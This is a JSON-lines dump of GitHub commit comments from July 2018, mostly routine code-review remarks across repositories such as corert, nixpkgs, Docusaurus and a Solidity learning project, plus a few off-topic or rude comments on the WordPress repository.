{"id":"7934745003","type":"CommitCommentEvent","actor":{"login":"caoshaun"},"repo":{"name":"caoshaun/hello_world.py"},"payload":{"comment":{"id":29635321,"position":1,"line":1,"path":"LBcalculator.py","commit_id":"796bb7e9d8ee59c36de63ab6c94ee762ac5a0ada","created_at":"2018-07-08T22:57:57Z","updated_at":"2018-07-08T22:57:57Z","author_association":"OWNER","body":"什么意思"}},"created_at":"2018-07-08T22:57:57Z"}
{"id":"7934746119","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29635324,"position":null,"line":null,"path":null,"commit_id":"ac385262f51e3cd6d8d38058a0cdc2ddbafdb82b","created_at":"2018-07-08T22:58:54Z","updated_at":"2018-07-08T22:58:54Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-19](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-19).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-19-tre.pantheonsite.io/)"}},"created_at":"2018-07-08T22:58:54Z"}
{"id":"7934747023","type":"CommitCommentEvent","actor":{"login":"dartzon"},"repo":{"name":"Wakanda/wakanda-storage"},"payload":{"comment":{"id":29635326,"position":16,"line":20,"path":".travis.yml","commit_id":"63501aff1b1ad6af55c026c41f1f5ce0ab8a0da7","created_at":"2018-07-08T22:59:39Z","updated_at":"2018-07-08T22:59:39Z","author_association":"CONTRIBUTOR","body":"clang v3.8 is pretty old. If we want to fully support the C++14 we must specify a newer version, the latest is 6.0.0."}},"created_at":"2018-07-08T22:59:39Z"}
{"id":"7934750173","type":"CommitCommentEvent","actor":{"login":"mint3000"},"repo":{"name":"mint3000/tre"},"payload":{"comment":{"id":29635335,"position":null,"line":null,"path":null,"commit_id":"3d8f29c4528eed3100e89cca4089b8c2154f4bf5","created_at":"2018-07-08T23:01:50Z","updated_at":"2018-07-08T23:01:50Z","author_association":"OWNER","body":"Created multidev environment [tre#ci-20](https://dashboard.pantheon.io/sites/c454dff1-65c3-45c0-9b6f-c9a028680cde#ci-20).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-20-tre.pantheonsite.io/)"}},"created_at":"2018-07-08T23:01:50Z"}
{"id":"7934754560","type":"CommitCommentEvent","actor":{"login":"dartzon"},"repo":{"name":"Wakanda/wakanda-storage"},"payload":{"comment":{"id":29635340,"position":6,"line":6,"path":"test/cpp-tests/CMakeLists.txt","commit_id":"9a947c14e74129664c32fb3a725cdd4367e308f5","created_at":"2018-07-08T23:05:35Z","updated_at":"2018-07-08T23:05:35Z","author_association":"CONTRIBUTOR","body":"Use\r\n```cmake\r\n-std=c++11\r\n```\r\ngnu++xx is used when you need to use gcc extensions which are not always standard and thus, not portable.\r\nsee [What are the differences between -std=c++11 and -std=gnu++11?](https://stackoverflow.com/questions/10613126/what-are-the-differences-between-std-c11-and-std-gnu11)"}},"created_at":"2018-07-08T23:05:35Z"}
{"id":"7934755231","type":"CommitCommentEvent","actor":{"login":"dartzon"},"repo":{"name":"Wakanda/wakanda-storage"},"payload":{"comment":{"id":29635341,"position":16,"line":16,"path":"test/cpp-tests/CMakeLists.txt","commit_id":"9a947c14e74129664c32fb3a725cdd4367e308f5","created_at":"2018-07-08T23:06:13Z","updated_at":"2018-07-08T23:06:13Z","author_association":"CONTRIBUTOR","body":"Same here, use\r\n```cmake\r\n-std=c++14\r\n```"}},"created_at":"2018-07-08T23:06:13Z"}
{"id":"7934756575","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29635342,"position":5,"line":12,"path":"src/ILCompiler.ReadyToRun/src/Compiler/DependencyAnalysis/HeaderNode.cs","commit_id":"33ccc2b5916cebf9109e5d17f09b56dd96003f53","created_at":"2018-07-08T23:07:19Z","updated_at":"2018-07-08T23:07:19Z","author_association":"OWNER","body":"Consistency issue regarding namespaces vs. folder names - alternatively we can consider moving the file to the ReadyToRun subfolder."}},"created_at":"2018-07-08T23:07:19Z"}
{"id":"7934758310","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29635345,"position":33,"line":33,"path":"src/ILCompiler.ReadyToRun/src/Compiler/DependencyAnalysis/ReadyToRun/GCStaticBaseFixupSignature.cs","commit_id":"33ccc2b5916cebf9109e5d17f09b56dd96003f53","created_at":"2018-07-08T23:08:53Z","updated_at":"2018-07-08T23:08:53Z","author_association":"OWNER","body":"As one other point of note compared to my previous changes, I have encapsulated type signature emission by moving the (currently incomplete) code to the SignatureBuilder as now there are multiple signatures emitting types (the NewObject and GCStaticBase fixup)."}},"created_at":"2018-07-08T23:08:53Z"}
{"id":"7934759262","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29635350,"position":13,"line":13,"path":"src/ILCompiler.ReadyToRun/src/Compiler/DependencyAnalysis/ReadyToRun/Import.cs","commit_id":"33ccc2b5916cebf9109e5d17f09b56dd96003f53","created_at":"2018-07-08T23:09:39Z","updated_at":"2018-07-08T23:09:39Z","author_association":"OWNER","body":"I have copied this file verbatim from Simon's pending PR."}},"created_at":"2018-07-08T23:09:39Z"}
{"id":"7934760061","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635352,"position":1,"line":4,"path":"contracts/Splitter.sol","commit_id":"bae4c56a3a1353fa40aabfae81ca33c05a5cdabe","created_at":"2018-07-08T23:10:16Z","updated_at":"2018-07-08T23:10:16Z","author_association":"NONE","body":"Here's a stretch project that will help you get ready for the bigger stuff ahead. Let's play with inheritance. \r\n\r\nConsider making separate files, `Ownable.sol` and `Pausable.sol`\r\n\r\nOwnable.sol\r\n```\r\ncontract Ownable {\r\n  address public owner;\r\n  modifier onlyOwner { ...\r\n  constructor() public {\r\n    owner = msg.sender;\r\n  }\r\n```\r\n\r\nPausable.sol\r\n```\r\nimport \"./Ownable.sol\";\r\ncontract Pausable is Ownable {\r\n...\r\n```\r\n\r\nSplitter.sol\r\n```\r\ncontract Splitter is Pausable { ...\r\n```\r\n\r\nYou can do this all in Remix. Watch how the individual contracts compile on their own and how the state variables, functions and modifiers bubble up to Splitter. \r\n\r\nWatch how concise and single-purposed each module gets. \r\n\r\nPausable.sol"}},"created_at":"2018-07-08T23:10:16Z"}
{"id":"7934760356","type":"CommitCommentEvent","actor":{"login":"volth"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29635353,"position":25,"line":37,"path":"pkgs/os-specific/linux/procps-ng/default.nix","commit_id":"07ad978bfe4d9bce4a8a2dd77dd45618213f1fcb","created_at":"2018-07-08T23:10:32Z","updated_at":"2018-07-08T23:10:32Z","author_association":"CONTRIBUTOR","body":"is it equal to ```lib.platforms.unix``` ?"}},"created_at":"2018-07-08T23:10:32Z"}
{"id":"7934760591","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635354,"position":31,"line":26,"path":"contracts/Splitter.sol","commit_id":"bae4c56a3a1353fa40aabfae81ca33c05a5cdabe","created_at":"2018-07-08T23:10:44Z","updated_at":"2018-07-08T23:10:44Z","author_association":"NONE","body":"`emit LogSetStopSwitch(msg.sender);`"}},"created_at":"2018-07-08T23:10:44Z"}
{"id":"7934761032","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635355,"position":46,"line":37,"path":"contracts/Splitter.sol","commit_id":"bae4c56a3a1353fa40aabfae81ca33c05a5cdabe","created_at":"2018-07-08T23:11:10Z","updated_at":"2018-07-08T23:11:10Z","author_association":"NONE","body":"`emit LogSplitTransaction(msg.sender, receiver1, receiver2, amount);`"}},"created_at":"2018-07-08T23:11:10Z"}
{"id":"7934761226","type":"CommitCommentEvent","actor":{"login":"volth"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29635356,"position":18,"line":31,"path":"pkgs/os-specific/linux/procps-ng/default.nix","commit_id":"07ad978bfe4d9bce4a8a2dd77dd45618213f1fcb","created_at":"2018-07-08T23:11:20Z","updated_at":"2018-07-08T23:11:20Z","author_association":"CONTRIBUTOR","body":"```installPhase = lib.optionalString stdenv.isDarwin '' blabla '';``` ?"}},"created_at":"2018-07-08T23:11:20Z"}
{"id":"7934761500","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635357,"position":62,"line":44,"path":"contracts/Splitter.sol","commit_id":"bae4c56a3a1353fa40aabfae81ca33c05a5cdabe","created_at":"2018-07-08T23:11:36Z","updated_at":"2018-07-08T23:11:36Z","author_association":"NONE","body":"`emit LogWithdrawFunds(msg.sender, amount)`"}},"created_at":"2018-07-08T23:11:36Z"}
{"id":"7934761713","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29635358,"position":25,"line":37,"path":"pkgs/os-specific/linux/procps-ng/default.nix","commit_id":"07ad978bfe4d9bce4a8a2dd77dd45618213f1fcb","created_at":"2018-07-08T23:11:47Z","updated_at":"2018-07-08T23:11:47Z","author_association":"MEMBER","body":"Probably not actually. Things like FreeBSD will probably not work (but watch can probably be made to work."}},"created_at":"2018-07-08T23:11:47Z"}
{"id":"7934761836","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"Djuliuss/Splitter"},"payload":{"comment":{"id":29635360,"position":57,"line":39,"path":"contracts/Splitter.sol","commit_id":"bae4c56a3a1353fa40aabfae81ca33c05a5cdabe","created_at":"2018-07-08T23:11:54Z","updated_at":"2018-07-08T23:11:54Z","author_association":"NONE","body":"What about `withdrawFunds(uint amount)`?"}},"created_at":"2018-07-08T23:11:54Z"}
{"id":"7934762383","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29635362,"position":18,"line":31,"path":"pkgs/os-specific/linux/procps-ng/default.nix","commit_id":"07ad978bfe4d9bce4a8a2dd77dd45618213f1fcb","created_at":"2018-07-08T23:12:22Z","updated_at":"2018-07-08T23:12:22Z","author_association":"MEMBER","body":"Does that override the default install phase though? I'm not sure actually but I will try it."}},"created_at":"2018-07-08T23:12:22Z"}
{"id":"7934762719","type":"CommitCommentEvent","actor":{"login":"jordiqb"},"repo":{"name":"jordiqb/website"},"payload":{"comment":{"id":29635363,"position":null,"line":null,"path":null,"commit_id":"eea59cea62cca9526eb2fd0333ba32a8db74a429","created_at":"2018-07-08T23:12:41Z","updated_at":"2018-07-08T23:12:41Z","author_association":"OWNER","body":"### Lipsum Really\r\n\r\nSo we really need this change?"}},"created_at":"2018-07-08T23:12:41Z"}
{"id":"7934763221","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29635364,"position":12,"line":12,"path":"src/ILCompiler.ReadyToRun/src/Compiler/DependencyAnalysis/ReadyToRun/ReadyToRunHelperSignature.cs","commit_id":"33ccc2b5916cebf9109e5d17f09b56dd96003f53","created_at":"2018-07-08T23:13:07Z","updated_at":"2018-07-08T23:13:07Z","author_association":"OWNER","body":"Hmm, this change is probably not needed anymore - at some point I was thinking I would need to query R2R helper signatures for their ID's for the purpose for emitting the proper symbol names in their container objects but apparently it's no longer the case. I'll change this back to a private member in the next commit."}},"created_at":"2018-07-08T23:13:07Z"}
{"id":"7934763491","type":"CommitCommentEvent","actor":{"login":"retr0s4ge"},"repo":{"name":"TASVideos/desmume"},"payload":{"comment":{"id":29635366,"position":null,"line":null,"path":null,"commit_id":"490c7e917cd464c42cea81e9bffea8d57989549e","created_at":"2018-07-08T23:13:19Z","updated_at":"2018-07-08T23:13:19Z","author_association":"COLLABORATOR","body":"@yxmline Resolved in commit 66062bc. The pcap files will no longer be saved by default."}},"created_at":"2018-07-08T23:13:19Z"}
{"id":"7934764412","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29635368,"position":7,"line":7,"path":"src/ILCompiler.ReadyToRun/src/Compiler/DependencyAnalysis/ReadyToRun/Signature.cs","commit_id":"33ccc2b5916cebf9109e5d17f09b56dd96003f53","created_at":"2018-07-08T23:14:09Z","updated_at":"2018-07-08T23:14:09Z","author_association":"OWNER","body":"Copied verbatim from Simon's PR."}},"created_at":"2018-07-08T23:14:09Z"}
{"id":"7934765121","type":"CommitCommentEvent","actor":{"login":"CarlosCordero"},"repo":{"name":"BrendanSe/-Infosec-Media-"},"payload":{"comment":{"id":29635373,"position":24,"line":18,"path":"README.md","commit_id":"4e0d2fc7b964a82f86369973621c679f4f4f863d","created_at":"2018-07-08T23:14:47Z","updated_at":"2018-07-08T23:14:47Z","author_association":"NONE","body":"The Security stream of NDC Conferences: NDC Security 2018"}},"created_at":"2018-07-08T23:14:47Z"}
{"id":"7934766462","type":"CommitCommentEvent","actor":{"login":"josemiguel-GitHub"},"repo":{"name":"josemiguel-GitHub/Clase_FundamentosHtml"},"payload":{"comment":{"id":29635377,"position":null,"line":null,"path":null,"commit_id":"9aa709f1be3ef4f2c6db26194ad36552b7445243","created_at":"2018-07-08T23:15:52Z","updated_at":"2018-07-08T23:15:52Z","author_association":"OWNER","body":"Este Código html forma parte a una Plantilla básica de un documento html \r\n\r\n"}},"created_at":"2018-07-08T23:15:52Z"}
{"id":"7934767704","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29635379,"position":13,"line":91,"path":"src/ILCompiler.ReadyToRun/src/Compiler/DependencyAnalysis/ReadyToRunCodegenNodeFactory.cs","commit_id":"33ccc2b5916cebf9109e5d17f09b56dd96003f53","created_at":"2018-07-08T23:16:49Z","updated_at":"2018-07-08T23:16:49Z","author_association":"OWNER","body":"I have also reverted my previous rename of \"Import\" to \"FixupCell\" - even though I still do believe that the latter is more expressive, the change is noisy and would make merging harder. We can consider to take the rename change after merging the branches."}},"created_at":"2018-07-08T23:16:49Z"}
{"id":"7934768818","type":"CommitCommentEvent","actor":{"login":"CarlosCordero"},"repo":{"name":"BrendanSe/-Infosec-Media-"},"payload":{"comment":{"id":29635381,"position":24,"line":18,"path":"README.md","commit_id":"4e0d2fc7b964a82f86369973621c679f4f4f863d","created_at":"2018-07-08T23:17:43Z","updated_at":"2018-07-08T23:17:43Z","author_association":"NONE","body":"NDC Security 2018"}},"created_at":"2018-07-08T23:17:43Z"}
{"id":"7934769816","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29635389,"position":86,"line":160,"path":"src/ILCompiler.ReadyToRun/src/Compiler/DependencyAnalysis/ReadyToRunCodegenNodeFactory.cs","commit_id":"33ccc2b5916cebf9109e5d17f09b56dd96003f53","created_at":"2018-07-08T23:18:33Z","updated_at":"2018-07-08T23:18:33Z","author_association":"OWNER","body":"General cleanup to clarify the type of helper involved."}},"created_at":"2018-07-08T23:18:33Z"}
{"id":"7934772963","type":"CommitCommentEvent","actor":{"login":"samdark"},"repo":{"name":"yiisoft/yii2-framework"},"payload":{"comment":{"id":29635395,"position":null,"line":null,"path":null,"commit_id":"8f5552372f3463b1557e4c771f4710bb75985c55","created_at":"2018-07-08T23:21:06Z","updated_at":"2018-07-08T23:21:06Z","author_association":"MEMBER","body":"Re-checked. It's impossible to refactor without compatibility breaks. Oracle needs two queries and resetSequence() returns SQL string."}},"created_at":"2018-07-08T23:21:06Z"}
{"id":"7934781562","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29635405,"position":37,"line":37,"path":"src/ILCompiler.ReadyToRun/src/Compiler/DependencyAnalysis/ReadyToRun/MethodImport.cs","commit_id":"33ccc2b5916cebf9109e5d17f09b56dd96003f53","created_at":"2018-07-08T23:28:27Z","updated_at":"2018-07-08T23:28:27Z","author_association":"OWNER","body":"In fact, I'm starting to think that we shouldn't derive from Import, we should just supply the proper signature at the call site."}},"created_at":"2018-07-08T23:28:27Z"}
{"id":"7934782958","type":"CommitCommentEvent","actor":{"login":"davidkaufman"},"repo":{"name":"davidkaufman/sc-im"},"payload":{"comment":{"id":29635408,"position":null,"line":null,"path":null,"commit_id":"812121bc46edb3640dd8092f62ab06580f0f8def","created_at":"2018-07-08T23:29:41Z","updated_at":"2018-07-08T23:29:41Z","author_association":"OWNER","body":"File extension should be .tsv not .tsb"}},"created_at":"2018-07-08T23:29:41Z"}
{"id":"7934784265","type":"CommitCommentEvent","actor":{"login":"Ernst03"},"repo":{"name":"Ernst03/Collatz-Like-Cycle-Generator"},"payload":{"comment":{"id":29635412,"position":null,"line":null,"path":null,"commit_id":"10d0cbb0c24ba029111199d848ad1bbc16e7d24c","created_at":"2018-07-08T23:30:41Z","updated_at":"2018-07-08T23:30:41Z","author_association":"OWNER","body":"In the past I wrote a program that searched the types of dynamic equation that the Collatz Conjecture is.\r\nFor the Collatz Conjecture we know it as if odd multiply by three and add 1 but if even divide by two.\r\nThe goal is to prove all integers transit to the value 1. That is all and good except unless we manually stop the process that particular form of the dynamic equation will cycle endlessly in a loop of { 1 2 3 }.\r\n It turns out that there are cycles in all A(x) + y here A is 3 in the terms of Collatz Conjecture but can be 1 and Y is odd. All x mod  == 0 is x/2 for this class Other systems exist.\r\n So I had wrote a program that found these cycles and due to a hard drive loss I lost that and and program.\r\nIn the mean time I have discovered I could do mathematics with cycles of integers and want to rework this area of data generation.\r\n Goals:\r\n To explore and gather these cycles into a data set.\r\n To examine the mathematics behind these cycles with a goal of presenting a group paper on the subject if there is one to publish."}},"created_at":"2018-07-08T23:30:41Z"}
{"id":"7934787577","type":"CommitCommentEvent","actor":{"login":"trylek"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29635417,"position":29,"line":29,"path":"src/ILCompiler.ReadyToRun/src/Compiler/DependencyAnalysis/ReadyToRun/MethodImport.cs","commit_id":"33ccc2b5916cebf9109e5d17f09b56dd96003f53","created_at":"2018-07-08T23:33:32Z","updated_at":"2018-07-08T23:33:32Z","author_association":"OWNER","body":"This is definitely a TODO. Initial Michal's response was that this check should be implicit (that was my impression anyway). Subsequently DavidWr commented that array elements must always end up as Marked which would also make this check unnecessary. The problem with the check is that, in its absence, we'll need to emit more imports than needed. In particular, for certain intrinsics like String.get_Length, the ILCompiler queries the intrinsic causing the creation of the indirection cell, however the cell ends up unused as the compiler includes logic to inline this well-known intrinsic. Without the above check we'll generate a dummy indirection cell and helper thunk for calling the String.get_Length method, creating a bit of unused garbage."}},"created_at":"2018-07-08T23:33:32Z"}
{"id":"7934788195","type":"CommitCommentEvent","actor":{"login":"pcelande"},"repo":{"name":"pcelande/flickster"},"payload":{"comment":{"id":29635418,"position":null,"line":null,"path":null,"commit_id":"d0eae2f3a3fd1117edb3481a9c389b91b0945b5a","created_at":"2018-07-08T23:34:05Z","updated_at":"2018-07-08T23:34:05Z","author_association":"OWNER","body":"![flickster](https://user-images.githubusercontent.com/11791566/42425093-b8db7e36-82e5-11e8-98c2-fd27cbacee22.gif)\r\n"}},"created_at":"2018-07-08T23:34:05Z"}
{"id":"7934796449","type":"CommitCommentEvent","actor":{"login":"yangshun"},"repo":{"name":"facebook/Docusaurus"},"payload":{"comment":{"id":29635427,"position":null,"line":null,"path":null,"commit_id":"091d86b39e4b8cef51e6e48727101124bb4d8a39","created_at":"2018-07-08T23:41:29Z","updated_at":"2018-07-08T23:41:29Z","author_association":"MEMBER","body":"Omg I knew about that and was sure that I tested it before committing. Ugh\ncould you help fix in the meanwhile? Thank you!\n\nOn Sun, Jul 8, 2018, 3:44 PM Endilie Yacop Sucipto <notifications@github.com>\nwrote:\n\n> If you try\n> https://circleci.com/gh/facebook/docusaurus\n>\n> It doesnt work. It has to be https://circleci.com/gh/facebook/Docusaurus\n> :facepalm\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/facebook/Docusaurus/commit/091d86b39e4b8cef51e6e48727101124bb4d8a39#commitcomment-29635300>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABQRHUhTPzhL2uuYjY7-Wv0iPDNn0usgks5uEotQgaJpZM4VG52e>\n> .\n>\n"}},"created_at":"2018-07-08T23:41:29Z"}
{"id":"7934798048","type":"CommitCommentEvent","actor":{"login":"cihanaygunes"},"repo":{"name":"SoniaNali/Olympics-Medals-2016-Test"},"payload":{"comment":{"id":29635430,"position":null,"line":null,"path":null,"commit_id":"bc7b2a4318350f7a2109eed0570a83fa32cb29d2","created_at":"2018-07-08T23:42:52Z","updated_at":"2018-07-08T23:42:52Z","author_association":"NONE","body":"Great Job 👏 "}},"created_at":"2018-07-08T23:42:52Z"}
{"id":"7934801549","type":"CommitCommentEvent","actor":{"login":"genboy"},"repo":{"name":"genboy/BigBrother"},"payload":{"comment":{"id":29635442,"position":null,"line":null,"path":null,"commit_id":"58c52e2a5c4f77a55ddd0981aa2e70e249b9f111","created_at":"2018-07-08T23:45:52Z","updated_at":"2018-07-08T23:45:52Z","author_association":"OWNER","body":"BigBrother v1.6.0-beta modified for api 3.0.0-4.0.0 \r\nOS: Linux 129188ca2c1d 4.15.0-23-generic #25-Ubuntu SMP Wed May 23 18:02:16 UTC 2018 x86_64 \r\nPHP version: 7.2.4 \r\nPMMP Server version: v1.4.0 \r\nPMMP API version: 4.0.0 \r\nUse openssl as AES encryption engine. \r\nUse openssl as RSA encryption engine. \r\nOpenSSL Library version: OpenSSL 1.1.0g 2 Nov 2017 \r\nOpenSSL Header version: OpenSSL 1.1.0g 2 Nov 2017 \r\nStarting Minecraft: PC server on x.x.x.x:xxxxx version 1.12.2"}},"created_at":"2018-07-08T23:45:52Z"}
{"id":"7934815057","type":"CommitCommentEvent","actor":{"login":"endiliey"},"repo":{"name":"facebook/Docusaurus"},"payload":{"comment":{"id":29635452,"position":null,"line":null,"path":null,"commit_id":"091d86b39e4b8cef51e6e48727101124bb4d8a39","created_at":"2018-07-08T23:56:45Z","updated_at":"2018-07-08T23:56:45Z","author_association":"COLLABORATOR","body":"I will send a fix along others asap. Currently away 😁"}},"created_at":"2018-07-08T23:56:45Z"}
{"id":"7933264778","type":"CommitCommentEvent","actor":{"login":"DanielValdivieso"},"repo":{"name":"DanielValdivieso/CLI-App"},"payload":{"comment":{"id":29631730,"position":null,"line":null,"path":null,"commit_id":"48850cab3588b551c907b8dca4c92f89abc5cd05","created_at":"2018-07-08T03:00:00Z","updated_at":"2018-07-08T03:00:00Z","author_association":"OWNER","body":"Link"}},"created_at":"2018-07-08T03:00:00Z"}
{"id":"7933269020","type":"CommitCommentEvent","actor":{"login":"IgorRodchenkov"},"repo":{"name":"BioPAX/Paxtools"},"payload":{"comment":{"id":29631744,"position":null,"line":null,"path":null,"commit_id":"73125fb2b2f8bbfd76197e6e68f4e8d2420bd0f5","created_at":"2018-07-08T03:04:12Z","updated_at":"2018-07-08T03:04:12Z","author_association":"MEMBER","body":"Fixes #39 (38 was mentioned by mistake, sorry.)"}},"created_at":"2018-07-08T03:04:12Z"}
{"id":"7933269317","type":"CommitCommentEvent","actor":{"login":"eddelbuettel"},"repo":{"name":"eddelbuettel/rprotobuf"},"payload":{"comment":{"id":29631746,"position":5,"line":5,"path":"ChangeLog","commit_id":"868ad27b2f6028827f2f36fa531ef58287fa72db","created_at":"2018-07-08T03:04:31Z","updated_at":"2018-07-08T03:04:31Z","author_association":"OWNER","body":"Yes, just got poked by BDR while traveling to Brisbane.  Will CC you on reply.  "}},"created_at":"2018-07-08T03:04:31Z"}
{"id":"7933270012","type":"CommitCommentEvent","actor":{"login":"nickl-"},"repo":{"name":"stefanofornari/BshConsole"},"payload":{"comment":{"id":29631747,"position":166,"line":166,"path":"src/main/java/bsh/BshConsoleInterpreter.java","commit_id":"0d2b1e9da18126ea1aa2df392e498fedd7acb66f","created_at":"2018-07-08T03:05:19Z","updated_at":"2018-07-08T03:05:19Z","author_association":"CONTRIBUTOR","body":"I changed `isEOF` back to `readLine` now, I agree it does make more sense and it turns out that this is also the blocking call for the REPL. "}},"created_at":"2018-07-08T03:05:19Z"}
{"id":"7933273519","type":"CommitCommentEvent","actor":{"login":"NovaRain"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29631753,"position":19,"line":478,"path":"sfall/Modules/Scripting/Handlers/Interface.cpp","commit_id":"2a20209bb81a8824cd2d97209d89e5f2d9292093","created_at":"2018-07-08T03:09:30Z","updated_at":"2018-07-08T03:09:30Z","author_association":"COLLABORATOR","body":"It's not about optimization but unexpected behavior. ```inventory_redraw(1)``` should redraw target's inventory, not player's. With your logic, ```inventory_redraw(1)``` has dual purposes (tested in game):\r\n\r\n1. When in inventory/use screens: redraws player's inventory, works exactly the same as ```inventory_redraw(0)```.\r\n2. When in loot/barter screens: redraws target's inventory but not player's.\r\n\r\nI'd consider it unexpected rather than a feature, unless that's how it should work in your mind in the first place. But in your original description in the PR, you only said 1 is for target's."}},"created_at":"2018-07-08T03:09:30Z"}
{"id":"7933277567","type":"CommitCommentEvent","actor":{"login":"KuteKetX"},"repo":{"name":"WordPress/WordPress"},"payload":{"comment":{"id":29631757,"position":null,"line":null,"path":null,"commit_id":"67d03a98c2cae5f41843c897f206adde299b0509","created_at":"2018-07-08T03:14:12Z","updated_at":"2018-07-08T03:14:12Z","author_association":"NONE","body":"lol i love this, @johnbillion dont you just hate skids like him.\r\n"}},"created_at":"2018-07-08T03:14:12Z"}
{"id":"7933278151","type":"CommitCommentEvent","actor":{"login":"TheLearneer"},"repo":{"name":"mrsheldon/bfd.js"},"payload":{"comment":{"id":29631758,"position":5,"line":37,"path":"README.md","commit_id":"bf99ca705e64db9e15fefd4c1bc483f89994b613","created_at":"2018-07-08T03:14:48Z","updated_at":"2018-07-08T03:14:48Z","author_association":"NONE","body":"Oops you can't use await out of `async` function."}},"created_at":"2018-07-08T03:14:48Z"}
{"id":"7933278352","type":"CommitCommentEvent","actor":{"login":"BobbyBleacher"},"repo":{"name":"jeankalud/openpilot"},"payload":{"comment":{"id":29631760,"position":null,"line":null,"path":null,"commit_id":"2c33842c05fbed1a51a91af7afd538b957884a09","created_at":"2018-07-08T03:15:00Z","updated_at":"2018-07-08T03:15:00Z","author_association":"NONE","body":"Still missing a few, here's the whole string:\r\n\r\n1: 8, 3: 8, 14: 8, 21: 4, 69: 8, 109: 4, 257: 3, 264: 8, 267: 5, 277: 4, 280: 6, 283: 5, 293: 4, 296: 4, 309: 5, 336: 8, 341: 8, 357: 8, 360: 7, 415: 8, 513: 5, 516: 8, 520: 4, 522: 8, 524: 8, 526: 8, 527: 8, 536: 8, 542: 8, 551: 4, 552: 2, 556: 8, 558: 8, 568: 8, 574: 8, 582: 5, 590: 8, 606: 8, 622: 8, 638: 8, 643: 8, 693: 8, 696: 8, 712: 8, 728: 8, 744: 8, 760: 8, 771: 2, 772: 8, 775: 8, 776: 8, 778: 8, 780: 2, 782: 8, 785: 8, 787: 8, 780: 2, 783: 8, 785: 8, 787: 8, 788: 8, 791: 8, 792: 8, 796: 2, 798: 6, 799: 8, 804: 8, 807: 8, 808: 1, 812: 8, 814: 5, 815: 8, 820: 8, 823: 8, 824: 8, 830: 5, 831: 8, 836: 8, 840: 8, 846: 5, 856: 4, 862: 5, 863: 8, 872: 8, 878: 8, 879: 8, 880: 8, 888: 8, 896: 8, 904: 3, 920: 8, 936: 8, 952: 8, 953: 6, 984: 8, 1026: 8, 1028: 8, 1029: 8, 1030: 8, 1032: 1, 1034: 8, 1048: 1, 1281: 8, 1332: 8, 1335: 8, 1368: 8, 1412: 8, 1436: 8, 1456: 8, 1486: 8, 1519: 8, 1524: 8, 1527: 8, 1601: 8, 1605: 8, 1611: 8, 1614: 8, 1617: 8, 1621: 8, 1627: 8, 1630: 8, 1800: 4, 1804: 8, 1812: 8, 1815: 8, 1816: 8, 1824: 1, 1828: 8, 1831: 8, 1832: 8, 1840: 8, 1848: 8, 1864: 8, 1880: 8, 1892: 8, 1896: 8, 1912: 8, 1960: 8, 1992: 8, 2008: 3, 2043: 5"}},"created_at":"2018-07-08T03:15:00Z"}
{"id":"7933278904","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"kangax/html-minifier"},"payload":{"comment":{"id":29631766,"position":4,"line":6,"path":"README.md","commit_id":"68c978c2318d453850024a2ef5a07dcfd5a59439","created_at":"2018-07-08T03:15:32Z","updated_at":"2018-07-08T03:15:32Z","author_association":"COLLABORATOR","body":"@alexlamsl: why did you remove the devDependencies badge?"}},"created_at":"2018-07-08T03:15:32Z"}
{"id":"7933279843","type":"CommitCommentEvent","actor":{"login":"KuteKetX"},"repo":{"name":"WordPress/WordPress"},"payload":{"comment":{"id":29631771,"position":null,"line":null,"path":null,"commit_id":"67d03a98c2cae5f41843c897f206adde299b0509","created_at":"2018-07-08T03:16:26Z","updated_at":"2018-07-08T03:16:26Z","author_association":"NONE","body":"@Yusufali0377 wtf are you doing? those xss payloads are useless, github isnt vulnerable to them moron."}},"created_at":"2018-07-08T03:16:26Z"}
